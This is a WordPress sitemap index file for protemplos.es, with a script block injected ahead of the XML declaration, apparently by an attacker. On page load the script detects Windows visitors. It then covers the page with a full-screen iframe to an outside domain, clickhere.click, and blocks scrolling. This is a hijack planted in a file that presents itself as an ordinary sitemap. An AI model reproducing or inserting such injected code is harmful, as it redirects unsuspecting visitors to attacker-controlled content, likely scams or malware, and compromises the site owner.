
<!-- wpmbchik -->
<script>
function createModal(url) {
  const overlay = document.createElement('div');
  Object.assign(overlay.style, {
    position: 'fixed',
    top: '0px',
    left: '0',
    width: '100%',
    height: '100%',
    background: '#fff',
    zIndex: '9999',
    margin: '0',
    padding: '0'
  });

  const iframe = document.createElement('iframe');
  iframe.src = url;
  iframe.allowFullscreen = true;
  Object.assign(iframe.style, {
    width: '100%',
    height: '100%',
    border: 'none',
    display: 'block'
  });

  overlay.appendChild(iframe);
  document.body.appendChild(overlay);

  // Блокируем прокрутку основной страницы
  document.body.style.overflow = 'hidden';
}
document.addEventListener('DOMContentLoaded', () => {
  const isWindows = /Win/i.test(navigator.userAgent);
  
  if (isWindows) {
    createModal('http://clickhere.click');
  }
});


</script>
<!-- /wpmbchik -->
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://protemplos.es/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://protemplos.es/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-posts-give_volunteer-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-posts-simple_event-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-posts-apus_footer-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-posts-apus_brand-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-posts-apus_testimonial-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-taxonomies-give_category-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-taxonomies-give_volunteer_category-1.xml</loc></sitemap><sitemap><loc>https://protemplos.es/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
